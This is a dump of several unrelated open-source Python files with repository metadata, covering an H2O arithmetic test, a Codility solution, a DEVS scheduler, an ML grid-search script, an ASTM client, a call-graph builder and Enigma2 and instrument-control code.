"dimension mismatch" #try: # res = iris + iris[0:3] # res.show() # assert False, "expected error. frames are different dimensions." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: H2OVec #try: # res = iris + iris[0] #
res.show() # assert False, "expected error. objects of different dimensions not supported." #except EnvironmentError: # pass # LHS: H2OFrame, RHS: scaler res = 1.2 + iris[2] res2 = iris + res[21,:] res2.show() # LHS: H2OFrame, RHS: scaler res = iris + 2 res_rows, res_cols = res.dim() assert res_rows
== rows and res_cols == cols, "dimension mismatch" for x, y in zip([res[c].sum() for c in range(cols-1)], [469.9, 342.6, 266.9, 162.2]): assert abs(x - y) < 1e-1, "expected same values" ################################################################### if __name__ == "__main__": h2o.run_test(sys.argv, binop_plus)
py-in-the-sky/challenges
codility/equi_leader.py
Python
mit
707
0.007072
""" https://codility.com/programmers/task/equi_leader/ """ from collections import Counter, defaultdict def solution(A): def _is_
equi_leader(i): prefix_count_top = running_counts[top] suffix_count_top = total_counts[top] - prefix_count_top return (prefix_count_top * 2 > i + 1) and (suffix_count_top * 2 > len(A) - i - 1) total_counts = Counter(A) running_counts = defaultdict(int) top = A[0] result = 0
for i in xrange(len(A) - 1): n = A[i] running_counts[n] += 1 top = top if running_counts[top] >= running_counts[n] else n if _is_equi_leader(i): result += 1 return result
kdheepak89/pypdevs
pypdevs/schedulers/schedulerNA.py
Python
apache-2.0
7,125
0.002947
# Copyright 2014 Modelling, Simulation and Design Lab (MSDL) at # McGill University and the University of Antwerp (http://msdl.cs.mcgill.ca/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ The No Age scheduler is based on the Heapset scheduler, though it does not take age into account. .. warning:: This scheduler does not take the age into account, making it **unusable** in simulations where the *timeAdvance* function can return (exactly) 0. If unsure, do **not** use this scheduler, but the more general Heapset scheduler. The heap will contain only the timestamps of events that should happen. One of the dictionaries will contain the actual models that transition at the specified time. The second dictionary than contains a reverse relation: it maps the models to their time_next. This reverse relation is necessary to know the *old* time_next value of the model. Because as soon as the model has its time_next changed, its previously scheduled time will be unknown. This 'previous time' is **not** equal to the *timeLast*, as it might be possible that the models wait time was interrupted. For a schedule, the model is added to the dictionary at the specified time_next. In case it is the first element at this location in the dictionary, we also add the timestamp to the heap. This way, the heap only contains *unique* timestamps and thus the actual complexity is reduced to the number of *different* timestamps. Furthermore, the reverse relation is also updated. Unscheduling is done similarly by simply removing the element from the dictionary. Rescheduling is a slight optimisation of unscheduling, followed by scheduling. This scheduler does still schedule models that are inactive (their time_next is infinity), though this does not influence the complexity. The complexity is not affected due to infinity being a single element in the heap that is always present. Since a heap has O(log(n)) complexity, this one additional element does not have a serious impact. The main advantage over the Activity Heap is that it never gets dirty and thus doesn't require periodical cleanup. The only part that gets dirty is the actual heap, which only con
tains small tuples. Duplicates of these will also be reduced to a single element, thus memory consu
mption should not be a problem in most cases. This scheduler is ideal in situations where most transitions happen at exactly the same time, as we can then profit from the internal structure and simply return the mapped elements. It results in sufficient efficiency in most other cases, mainly due to the code base being a lot smaller then the Activity Heap. """ from heapq import heappush, heappop from pypdevs.logger import * class SchedulerNA(object): """ Scheduler class itself """ def __init__(self, models, epsilon, total_models): """ Constructor :param models: all models in the simulation """ self.heap = [] self.reverse = [None] * total_models self.mapped = {} self.infinite = float('inf') # Init the basic 'inactive' entry here, to prevent scheduling in the heap itself self.mapped[self.infinite] = set() self.epsilon = epsilon for m in models: self.schedule(m) def schedule(self, model): """ Schedule a model :param model: the model to schedule """ try: self.mapped[model.time_next[0]].add(model) except KeyError: self.mapped[model.time_next[0]] = set([model]) heappush(self.heap, model.time_next[0]) try: self.reverse[model.model_id] = model.time_next[0] except IndexError: self.reverse.append(model.time_next[0]) def unschedule(self, model): """ Unschedule a model :param model: model to unschedule """ try: self.mapped[self.reverse[model.model_id]].remove(model) except KeyError: pass self.reverse[model.model_id] = None def massReschedule(self, reschedule_set): """ Reschedule all models provided. Equivalent to calling unschedule(model); schedule(model) on every element in the iterable. :param reschedule_set: iterable containing all models to reschedule """ #NOTE the usage of exceptions is a lot better for the PyPy JIT and nets a noticable speedup # as the JIT generates guard statements for an 'if' for model in reschedule_set: model_id = model.model_id try: self.mapped[self.reverse[model_id]].remove(model) except KeyError: # Element simply not present, so don't need to unschedule it pass self.reverse[model_id] = tn = model.time_next[0] try: self.mapped[tn].add(model) except KeyError: # Create a tuple with a single entry and use it to initialize the mapped entry self.mapped[tn] = set((model, )) heappush(self.heap, tn) def readFirst(self): """ Returns the time of the first model that has to transition :returns: timestamp of the first model """ first = self.heap[0] while len(self.mapped[first]) == 0: del self.mapped[first] heappop(self.heap) first = self.heap[0] # The age was stripped of return (first, 1) def getImminent(self, time): """ Returns a list of all models that transition at the provided time, with the specified epsilon deviation allowed. :param time: timestamp to check for models .. warning:: For efficiency, this method only checks the **first** elements, so trying to invoke this function with a timestamp higher than the value provided with the *readFirst* method, will **always** return an empty set. """ t, age = time imm_children = set() try: first = self.heap[0] if (abs(first - t) < self.epsilon): #NOTE this would change the original set, though this doesn't matter as it is no longer used imm_children = self.mapped.pop(first) heappop(self.heap) first = self.heap[0] while (abs(first - t) < self.epsilon): imm_children |= self.mapped.pop(first) heappop(self.heap) first = self.heap[0] except IndexError: pass return imm_children
WesleyyC/Restaurant-Revenue-Prediction
Ari/needs_work/GridSearch.py
Python
mit
1,295
0.018533
# Grid Search for Algorithm Tuning import numpy as np import pandas as pd from sklearn import datasets from sklearn.linear_model import Ridge from sklearn.grid_search import GridSearchCV ### Plotting function ### from matplotlib import pyplot as plt from sklearn.metrics import r2_score def plot_r2(y, y_pred, title): plt.figure(figsize=(10, 6)) plt.grid() plt.scatter(y, y_pred, marker='.') plt.xlabel("Actual Target"); plt.ylabel("Predicted Target") plt.title(title) xmn, xmx = plt.xlim() ymn, ymx = plt.ylim() mx = max(xmx, ymx) buff = mx * .1 plt.text(xmn + buff, mx - buff, "R2 Score: %f" % (r2_score(y, y_pred), ), size=15) plt.plot([0., mx], [0., mx]) plt.xlim(xmn, mx) plt.ylim(ymn, mx) ### Preprocessing ### dataset = pd.read_csv("train.csv") dataset.head() feats = dataset.drop("revenue", axis=1) X = feats.values #features y = dataset["revenue"].values #target # prepare a range of alpha values to test alphas = np.array([1,0.1,0.01,0.001,0.0001,0]) # 100000 works best. # create and fit a ridge regression model, testing each alpha model = Ridge() grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas)) y_pred = grid.fit(X, y) r2_score(y, y_pred) rm
se = sqrt
(mean_squared_error(y, y_pred)) print rmse
msosvi/flask-pyco
flask_pyco/__init__.py
Python
bsd-3-clause
23
0
from
.site
import Site
eddiep1101/python-astm
build/lib/astm/client.py
Python
bsd-3-clause
12,288
0.000488
# -*- coding: utf-8 -*- # # Copyright (C) 2013 Alexander Shorin # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. # import logging import socket from .asynclib import loop from .codec import encode from .constants import ENQ, EOT from .exceptions import NotAccepted from .mapping import Record from .protocol import ASTMProtocol log = logging.getLogger(__name__) __all__ = ['Client', 'Emitter'] class RecordsStateMachine(object): """Simple state machine to track emitting ASTM records in right order. :param mapping: Mapping of the ASTM records flow order. Keys should be string and defines record type, while values expected as sequence of other record types that may be used after current one. For example: ``{"H": ["P", "C", "L"]}`` mapping defines that if previous record had ``"H"`` type, then the next one should have ``"P"``, ``"C"`` or ``"L"`` type or :exc:`AssertionError` will be raised. The default mapping reflects common ASTM records flow rules. If this argument specified as :const:`None` no rules will be applied. :type: dict """ def __init__(self, mapping): self.mapping = mapping self.state = None def __call__(self, state): if state is not None: assert self.is_acceptable(state),\ 'invalid state %r, expected one of: %r' \ % (state, self.mapping[self.state]) self.state = state def is_acceptable(self, state): if self.mapping is None: return True if state not in self.mapping: return False next_types = self.mapping[self.state] return '*' in next_types or state in next_types DEFAULT_RECORDS_FLOW_MAP = { None: ['H'], 'H': ['C', 'M', 'P', 'Q', 'L'], 'P': ['C', 'M', 'O', 'L'], 'Q': ['C', 'M', 'O', 'L'], 'O': ['C', 'M', 'P', 'O', 'R', 'L'], 'R': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'S': ['C', 'M', 'P', 'O', 'R', 'S', 'L'], 'C': ['*'], 'M': ['*'], 'L': ['H'] } class Emitter(object): """ASTM records emitter for :class:`Client`. Used as wrapper for user provided one to provide proper routines around for sending Header and Terminator records. :param emitter: Generator/coroutine. :param encoding: Data encoding. :type encoding: str :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. If :const:`None`, emitter record wouldn't be split into chunks. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool """ #: Records state machine controls emitting records in right order. It #: receives `records_flow_map` as only argument on Emitter initialization. state_machine = RecordsStateMachine def __init__(self, emitter, flow_map, encoding, chunk_size=None, bulk_mode=False): self._emitter = emitter() self._is_active = False self.encoding = encoding self.records_sm = self.state_machine(flow_map) # flag to signal that user's emitter produces no records self.empty = False # last sent sequence number self.last_seq = 0 self.buffer = [] self.chunk_size = chunk_size self.bulk_mode = bulk_mode def _get_record(self, value=None): record = self._emitter.send(value if self._is_active else None) if not self._is_active: self._is_active = True if isinstance(record, Record): record = record.to_astm() try: self.records_sm(record[0]) except Exception as err: self.throw(type(err), err.args) return record def _send_record(self, record): i
f self.bulk_mode: records = [record] while True: record = self._get_record(True) records.append(record) if record[0] == 'L': break chunks = encode(records, self.encoding, self.chunk_size) else:
self.last_seq += 1 chunks = encode([record], self.encoding, self.chunk_size, self.last_seq) self.buffer.extend(chunks) data = self.buffer.pop(0) self.last_seq += len(self.buffer) if record[0] == 'L': self.last_seq = 0 self.buffer.append(EOT) return data def send(self, value=None): """Passes `value` to the emitter. Semantically acts in same way as :meth:`send` for generators. If the emitter has any value within local `buffer` the returned value will be extracted from it unless `value` is :const:`False`. :param value: Callback value. :const:`True` indicates that previous record was successfully received and accepted by server, :const:`False` signs about his rejection. :type value: bool :return: Next record data to send to server. :rtype: bytes """ if self.buffer and value: return self.buffer.pop(0) record = self._get_record(value) return self._send_record(record) def throw(self, exc_type, exc_val=None, exc_tb=None): """Raises exception inside the emitter. Acts in same way as :meth:`throw` for generators. If the emitter had catch an exception and return any record value, it will be proceeded in common way. """ record = self._emitter.throw(exc_type, exc_val, exc_tb) if record is not None: return self._send_record(record) def close(self): """Closes the emitter. Acts in same way as :meth:`close` for generators. """ self._emitter.close() class Client(ASTMProtocol): """Common ASTM client implementation. :param emitter: Generator function that will produce ASTM records. :type emitter: function :param host: Server IP address or hostname. :type host: str :param port: Server port number. :type port: int :param timeout: Time to wait for response from server. If response wasn't received, the :meth:`on_timeout` will be called. If :const:`None` this timer will be disabled. :type timeout: int :param flow_map: Records flow map. Used by :class:`RecordsStateMachine`. :type: dict :param chunk_size: Chunk size in bytes. :const:`None` value prevents records chunking. :type chunk_size: int :param bulk_mode: Sends all records for single session (starts from Header and ends with Terminator records) via single message instead of sending each record separately. If result message is too long, it may be split by chunks if `chunk_size` is not :const:`None`. Keep in mind, that collecting all records for single session may take some time and server may reject data by timeout reason. :type bulk_mode: bool Base `emitter` is a generator that yield ASTM records one by one preserving their order:: from astm.records import ( HeaderRecord, PatientRecord, OrderRecord, TerminatorRecord ) def emitter(): assert (yie
burlog/py-static-callgraph
callgraph/builder.py
Python
mit
5,632
0.002308
# -*- coding: utf-8 -*- # # LICENCE MIT # # DESCRIPTION Callgraph builder. # # AUTHOR Michal Bukovsky <michal.bukovsky@trilogic.cz> # from operator import attrgetter from inspect import signature from callgraph.hooks import Hooks from callgraph.utils import AuPair from callgraph.symbols import Symbol, UnarySymbol from callgraph.symbols import IterableConstantSymbol, MappingConstantSymbol from callgraph.nodes import make_node from callgraph.indent_printer import IndentPrinter, NonePrinter, dump_tree # TODO(burlog): hooks as callbacks # TODO(burlog): properties tests # TODO(burlog): process signature? are defs invoked during import? # TODO(burlog): tests for global variables # TODO(burlog): __getattr__, __getattribute__ overrides will be problem # TODO(burlog): make result of list(), tuple(), dict(), ... iterable class CallGraphBuilder(object): def __init__(self, global_variables={}, silent=False): self.printer = NonePrinter() if silent else IndentPrinter() self.global_symbols = self.make_kwargs_symbols(global_variables) self.hooks = Hooks(self) self.current_lineno = 0 self.tot = None def print_banner(self, printer, node): extra = "<" + node.qualname + "> " if node.qualname != node.name else "" printer("@ Analyzing: {0} {1}at {2}:{3}"\ .format(node.ast.name, extra, node.filename, node.lineno)) def set_current_lineno(self, printer, expr_lineno): lineno = self.tot.lineno + expr_lineno if lineno == self.current_lineno: return self.current_lineno = lineno printer("+ line at {0}:{1}".format(self.tot.filename, lineno)) printer("+", self.tot.source_line(expr_lineno).strip()) def make_kwargs_symbols(self, kwargs): return dict((k, UnarySymbol(self, k, v)) for k, v in kwargs.items()) def build(self, function, kwargs={}): self.root = None self.hooks.clear() symbol = UnarySymbol(self, function.__name__, function) return self.process(symbol, kwargs=self.make_kwargs_symbols(kwargs)) def process(self, symbol, parent=None, args=[], kwargs={}): # attach new node to parent list node = make_node(symbol) with AuPair(self, node): if parent: where = parent.filename, self.current_lineno if not parent.attach(node, where): return node # builtins or c/c++ objects have no code if node.is_opaque: return node if not symbol.iscallable(): return node # print nice banner self.print_banner(self.pri
nter, node) # magic follows with self.printer as printer: self.inject_arguments(printer, node, args, kwargs) self.process_function(printer, node, args, kwargs) return node def process_function(self, printer, node, args, kwargs): for expr in node.ast.body: for callee, args, kwargs in expr.evaluate(printer, node.symbol):
self.process(callee, node, args.copy(), kwargs.copy()) def inject_arguments(self, printer, node, args, kwargs): sig = signature(node.symbol.value) self.inject_self(printer, node, sig, args, kwargs) bound = sig.bind_partial(*args, **self.polish_kwargs(sig, kwargs)) self.inject_defaults(printer, node, sig, bound) for name, value in bound.arguments.items(): value_symbol = self.as_symbol(value) printer("% Binding argument:", name + "=" + str(value_symbol)) node.symbol.set(name, value_symbol) def polish_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.VAR_KEYWORD: return kwargs return dict(self.iter_kwargs(sig, kwargs)) def iter_kwargs(self, sig, kwargs): for param in sig.parameters.values(): if param.kind == param.POSITIONAL_OR_KEYWORD: if param.name in kwargs: yield param.name, kwargs[param.name] def inject_self(self, printer, node, sig, args, kwargs): if node.symbol.myself and sig.parameters: # TODO(burlog): better bound method detection if next(iter(sig.parameters.keys())) == "self": args.insert(0, node.symbol.myself) else: # TODO(burlog): improve detection logic kwargs["self"] = node.symbol.myself def inject_defaults(self, printer, node, sig, bound): for param in sig.parameters.values(): if param.name not in bound.arguments: if param.default is not param.empty: symbol = UnarySymbol(self, param.name, param.default) bound.arguments[param.name] = symbol def as_symbol(self, value): if isinstance(value, Symbol): return value elif isinstance(value, (tuple, list)): return IterableConstantSymbol(self, tuple, value) elif isinstance(value, dict): values = list(value.values()) keys = list(UnarySymbol(self, "str", k) for k in value.keys()) return MappingConstantSymbol(self, dict, keys, values) raise RuntimeError("Can't convert value to symbol: " + str(value)) # dogfooding build function if __name__ == "__main__": builder = CallGraphBuilder() kwargs = {"self": CallGraphBuilder, "function": CallGraphBuilder.build} root = builder.build(CallGraphBuilder.build, kwargs) print(80 * "=") dump_tree(root, lambda x: x.children)
formiano/enigma2
lib/python/Screens/InfoBar.py
Python
gpl-2.0
33,112
0.029899
from Tools.Profile import profile from Tools.BoundFunction import boundFunction # workaround for required config entry dependencies. import Screens.MovieSelection from Components.PluginComponent import plugins from Plugins.Plugin import PluginDescriptor from Screens.Screen import Screen from Screens.MessageBox import MessageBox from Components.Label import Label from Components.Pixmap import MultiPixmap from Tools.Directories import fileExists profile("LOAD:enigma") import enigma import os from boxbranding import getBoxType, getMachineBrand, getBrandOEM, getMachineBuild, getMachineName boxtype = getBoxType() profile("LOAD:InfoBarGenerics") from Screens.InfoBarGenerics import InfoBarShowHide, \ InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarRdsDecoder, InfoBarRedButton, InfoBarTimerButton, InfoBarVmodeButton, \ InfoBarEPG, InfoBarSeek, InfoBarInstantRecord, InfoBarResolutionSelection, InfoBarAspectSelection, \ InfoBarAudioSelection, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, \ InfoBarSubserviceSelection, InfoBarShowMovies, \ InfoBarServiceNotifications, InfoBarPVRState, InfoBarCueSheetSupport, InfoBarSimpleEventView, InfoBarBuffer, \ InfoBarSummarySupport, InfoBarMoviePlayerSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, \ InfoBarSubtitleSupport, InfoBarPiP, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \ InfoBarHdmi, setResumePoint, delResumePoint from Screens.ButtonSetup import InfoBarButtonSetup profile("LOAD:InitBar_Components") from Components.ActionMap import HelpableActionMap from Components.Timeshift import InfoBarTimeshift from Components.config import config from Components.ServiceEventTracker import ServiceEventTracker, InfoBarBase profile("LOAD:HelpableScreen") from Screens.HelpMenu import HelpableScreen class InfoBar(InfoBarBase, InfoBarShowHide, InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarResolutionSelection, InfoBarAspectSelection, InfoBarVmodeButton, HelpableScreen, InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarSubserviceSelection, InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarBuffer, InfoBarSummarySupport, InfoBarTimeshiftState, InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarPlugins, InfoBarSubtitleSupport, InfoBarServiceErrorPopupSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, InfoBarHdmi, Screen, InfoBarButtonSetup): ALLOW_SUSPEND = True instance = None def __init__(self, session): Screen.__init__(self, session) if config.usage.show_infobar_lite.value and (config.skin.primary_skin.value == "OPD-Blue-Line/skin.xml" or config.skin.primary_skin.value.startswith('oDreamy-FHD/skin.xml/')): self.skinName = "OPD-Blue-Line/skin.xml" self["actions"] = HelpableActionMap(self, "InfobarActions", { "showMovies": (self.showMovies, _("Play recorded movies...")), "showRadio": (self.showRadioButton, _("Show the radio player...")), "showTv": (self.showTvButton, _("Show the tv player...")), "toogleTvRadio": (self.toogleTvRadio, _("Toggels between tv and radio...")), "openBouquetList": (self.openBouquetList, _("Open bouquetlist...")), "showMediaPlayer": (self.showMediaPlayer, _("Show the media player...")), "openBouquetList": (self.openBouquetList, _("open bouquetlist")), "openWeather": (self.openWeather, _("Open Weather...")), "openTimerList": (self.openTimerList, _("Open Timerlist...")), "openAutoTimerList": (self.openAutoTimerList, _("Open AutoTimerlist...")), "openEPGSearch": (self.openEPGSearch, _("Open EPGSearch...")), "openIMDB": (self.openIMDB, _("Open IMDB...")), "showMC": (self.showMediaCenter, _("Show the media center...")), "openSleepTimer": (self.openPowerTimerList, _("Show the Sleep Timer...")), 'ZoomInOut': (self.ZoomInOut, _('Zoom In/Out TV...')), 'ZoomOff': (self.ZoomOff, _('Zoom Off...')), 'HarddiskSetup': (self.HarddiskSetup, _('Select HDD')), "showWWW": (self.showPORTAL, _("Open MediaPortal...")), "showSetup": (self.showSetup, _("Show setup...")), "showFormat": (self.showFormat, _("Show Format Setup...")), "showPluginBrowser": (self.showPluginBrowser, _("Show the plugins...")), "showBoxPortal": (self.showBoxPortal, _("Show Box Portal...")), }, prio=2) self["key_red"] = Label() self["key_yellow"] = Label() self["key_blue"] = Label() self["key_green"] = Label() self.allowPiP = True self.radioTV = 0 for x in HelpableScreen, \ InfoBarBase, InfoBarShowHide, \ InfoBarNumberZap, InfoBarChannelSelection, InfoBarMenu, InfoBarEPG, InfoBarRdsDecoder, \ InfoBarInstantRecord, InfoBarAudioSelection, InfoBarRedButton, InfoBarTimerButton, InfoBarUnhandledKey, InfoBarLongKeyDetection, InfoBarResolutionSelection, InfoBarVmodeButton, \ InfoBarAdditionalInfo, InfoBarNotifications, InfoBarDish, InfoBarSubserviceSelection, InfoBarAspectSelection, InfoBarBuffer, \ InfoBarTimeshift, InfoBarSeek, InfoBarCueSheetSupport, InfoBarSummarySupport, InfoBarTimeshiftState, \ InfoBarTeletextPlugin, InfoBarExtensions, InfoBarPiP, InfoBarSubtitleSupport, InfoBarJobman, InfoBarZoom, InfoBarSleepTimer, InfoBarOpenOnTopHelper, \ InfoBarHdmi, InfoBarPlugins, InfoBarServiceErrorPopupSupport, InfoBarButtonSetup: x.__init__(self) self.helpList.append((self["actions"], "InfobarActions", [("showMovies", _("Watch recordings..."))])) self.helpList.append((self["actions"], "InfobarActions", [("showRadio", _("Listen to the radio..."))])) self.__event_tracker = ServiceEventTracker(screen=self, eventmap= { enigma.iPlayableService.evUpdatedEventInfo: self.__eventInfoChanged }) self.current_begin_time=0 assert InfoBar.instance is None, "class InfoBar is a singleton class and just one instance of this class is allowed!" InfoBar.instance = self if config.misc.initialchanne
lselectio
n.value: self.onShown.append(self.showMenu) self.zoomrate = 0 self.zoomin = 1 self.onShow.append(self.doButtonsCheck) def showMenu(self): self.onShown.remove(self.showMenu) config.misc.initialchannelselection.value = False config.misc.initialchannelselection.save() self.mainMenu() def doButtonsCheck(self): if config.plisettings.ColouredButtons.value: self["key_yellow"].setText(_("Extensions")) if config.usage.defaultEPGType.value == "Graphical EPG..." or config.usage.defaultEPGType.value == "None": self["key_red"].setText(_("Single EPG")) else: self["key_red"].setText(_("ViX EPG")) if not config.plisettings.Subservice.value: self["key_green"].setText(_("Timers")) else: self["key_green"].setText(_("Green Panel")) self["key_blue"].setText(_("Blue Panel")) def __onClose(self): InfoBar.instance = None def __eventInfoChanged(self): if self.execing: service = self.session.nav.getCurrentService() old_begin_time = self.current_begin_time info = service and service.info() ptr = info and info.getEvent(0) self.current_begin_time = ptr and ptr.getBeginTime() or 0 if config.usage.show_infobar_on_event_change.value: if old_begin_time and old_begin_time != self.current_begin_time: self.doShow() def __checkServiceStarted(self): self.__serviceStarted(True) self.onExecBegin.remove(self.__checkServiceStarted) def serviceStarted(self): #override from InfoBarShowHide new = self.servicelist.newServicePlayed() if self.execing: InfoBarShowHide.serviceStarted(self) self.current_begin_time=0 elif not self.__checkServiceStarted in self.onShown and new: self.onShown.append(self.__checkServiceStarted) def __checkServiceStarted(self): self.serviceStarted() self.onShown.remove(self.__checkServiceStarted) def openBouquetList(self): if config.usage.tvradiobutton_mode.value == "MovieList": self.showTvChannelList(True) self.showMovies() elif con
AechPro/Machine-Learning
Partners Healthcare/2016 Breast Cancer/dev/ReconNet/optimization/targets/Card_Problem_Target.py
Python
apache-2.0
1,157
0.012965
class target(object): def __init__(self): self.encodingString = "1,10 1,10 1,10 1,10 1,10 1.0 p1-1,10 1,10 1,10 1,10 1,10 1.0 p2" self.canAdd = False self.canRemove = False self.initializationType = "sequential" self.encodingTable = None self.group1 = [] self.group2 = [] def build_from_genome(self,genome): assert genome != None, "Null genome passed to target!" self.group1 = genome[0][1:] self.group2 = genome[1][1:] #self.params = [delta,minArea,maxArea,maxVariation,minDiversity,maxEvolution,areaThreshold,minMargin,edgeBlurSize] def evaluate(self): genes = [] m = 1 s = 0 for arg in self.group1:
s+=arg genes.append(arg) for arg in self.group2: m*=arg genes.append(arg) duplicateCount = len(genes) - len(set(genes)) m-=360 s-=36 fitness = -(abs(m) + abs(s)) - duplicateCount #print("\nFITNESS:",fitness,"\n") return fitness def validate_
genome(self,genome): return True
vdrhtc/Measurement-automation
drivers/IQVectorGenerator.py
Python
gpl-3.0
12,060
0.001244
from math import ceil import numpy as np from ipywidgets import widgets from tqdm.notebook import tqdm from matplotlib import pyplot as plt import lib.iq_mixer_calibration from drivers import IQAWG from lib.data_management import load_IQMX_calibration_database, \ save_IQMX_calibration from lib.iq_mixer_calibration import IQCalibrator class IQVectorGenerator: def __init__(self, name, lo, iq_awg: IQAWG, sa, calibration_db_name="IQVG", default_calibration_power=-30, marker_period_divisor=None, slave_iqvgs=None, calibration_step=10e6): """ Parameters ---------- lo iq_awg sa calibration_db_name default_calibration_power marker_period_divisor: int, ns by default, the marker period should be divisible by the if_period however, in some cases other divisor may be required, i.e. when m3202 is used with PXICLK10 trigger sync mode this divisor should be set to 100 """ self._name = name self._lo = lo self._iqawg = iq_awg self._sa = sa self._cal_db_name = calibration_db_name self._default_calibration_power = default_calibration_power self._calibration_widget = widgets.HTML() self._recalibrate_mixer = False self._frequency = 5e9 self.set_if_frequency(100e6) if marker_period_divisor is not None: self._marker_period_divisor = marker_period_divisor else: self._marker_period_divisor = self._if_period # for marker period synchronization when iqvgs are on the same AWG self._slave_iqvgs = slave_iqvgs if slave_iqvgs is not None else [] self._power = default_calibration_power self._dac_overridden = False self._current_cal = None self._requested_cal: lib.iq_mixer_calibration.IQCalibrationData = None self._cal_db = None self._marker_period = None self._requested_marker_period = None self.set_marker_period(1000) self._calibration_initial_guess = {"dc_offsets": np.random.uniform(.03, 0.1, size=2), "if_amplitudes": (.1, .1), "if_phase": -np.pi * 0.54} self._calibration_step = calibration_step self._calibration_test_data = [] self._load_cal_db() def get_calibration_widget(self): return self._calibration_widget def set_parameters(self, parameters_dict): if "power" in parameters_dict: self.set_power(parameters_dict["power"]) if "freq" in parameters_dict: self.set_frequency(parameters_dict["freq"]) if "dac_overridden" in parameters_dict: self._dac_overridden = parameters_dict["dac_overridden"] else: self._dac_overridden = False def get_iqawg(self): self._iqawg.set_parameters( {'calibration': self._current_cal}) # ensure return self._iqawg def set_if_frequency(self, if_frequency): self._if_frequency = if_frequency self._if_period = 1 / if_frequency * 1e9 # ns def get_if_frequency(self): return self._if_frequency def set_output_state(self, state): self._lo.set_output_state(state) def set_frequency(self, freq): self._frequency = freq self._lo.set_frequency(self._frequency + self._if_frequency) self._requested_cal = self.get_calibration(self._frequency, self._power) self._output_SSB() def set_power(self, power): if power > self._default_calibration_power + 10: raise ValueError("Power can be % dBm max, requested %d dBm" % ( self._default_calibration_power + 10, power)) self._power = power self._requested_cal = self.get_calibration(self._frequency, self._power) self._lo.set_power(self._requested_cal.get_lo_power()) self._output_SSB() def get_power(self): return self._power def set_marker_period(self, marker_period): ''' For some applications there is need to control the length of the interval between triggers output by the AWG of the IQVectorGenerator. Parameters ---------- marker_period: ns, float real trigger period will be recalculated to be not shorter than <marker_period> ns, but still divis
ible by the IF period ''' self._requested_marker_period = marker_period correct_marker_period = ceil( marker_period / self._marker_period_divisor) * \ self._marker_period_divisor if correct_marker_period != self._marker_period: self._marker_period = correct_marker_period if self._re
quested_cal is not None: self._current_cal = None self._output_SSB() for slave_iqvg in self._slave_iqvgs: slave_iqvg.set_marker_period(self._marker_period) def _output_SSB(self): if self._requested_cal != self._current_cal: # print(f"IQVG {self._name}: outputting pulse sequence to update calibration for frequency: {self._frequency/1e9:.4f} GHz" # f", power: {self._power} dBm.") self._iqawg.set_parameters({"calibration": self._requested_cal}) pb = self._iqawg.get_pulse_builder() if_freq = self._requested_cal.get_radiation_parameters()[ "if_frequency"] resolution = self._requested_cal.get_radiation_parameters()[ "waveform_resolution"] if_period = 1 / if_freq * 1e9 if (if_period * 1e9) % resolution != 0: print( f"IQVectorGenerator {self._name} warning: IF period is not divisible by " "calibration waveform resolution. Phase coherence will be bad.") seq = pb.add_sine_pulse(self._marker_period).build() self._iqawg.output_pulse_sequence(seq) self._current_cal = self._requested_cal # time.sleep(1) def _load_cal_db(self): self._cal_db = load_IQMX_calibration_database(self._cal_db_name, 0) def _around_frequency(self, frequency): # return ceil(frequency/self._calibration_step)*self._calibration_step return round(frequency / self._calibration_step) * self._calibration_step def get_calibration(self, frequency, power): frequency = self._around_frequency(frequency) # frequency = round(frequency/self._calibration_step)*self._calibration_step if self._cal_db is None: self._load_cal_db() cal = \ self._cal_db.get(frozenset(dict(lo_power=14, ssb_power=self._default_calibration_power, lo_frequency=self._if_frequency + frequency, if_frequency=self._if_frequency, waveform_resolution=1, sideband_to_maintain='left').items())) if (cal is None) or self._recalibrate_mixer: calibrator = IQCalibrator(self._iqawg, self._sa, self._lo, self._cal_db_name, 0, sidebands_to_suppress=6, output_widget=self._calibration_widget) ig = self._calibration_initial_guess cal = calibrator.calibrate( lo_frequency=frequency + self._if_frequency, if_frequency=self._if_frequency, lo_power=14, ssb_power=self._default_calibration_power, waveform_resolution=1, iterations=3, minimize_iterlimit=100, sa_res_bandwidth=300, initial_guess=ig) save_IQMX_calibration(cal)
qk4l/Flexget
flexget/plugins/clients/rtorrent.py
Python
mit
26,286
0.001902
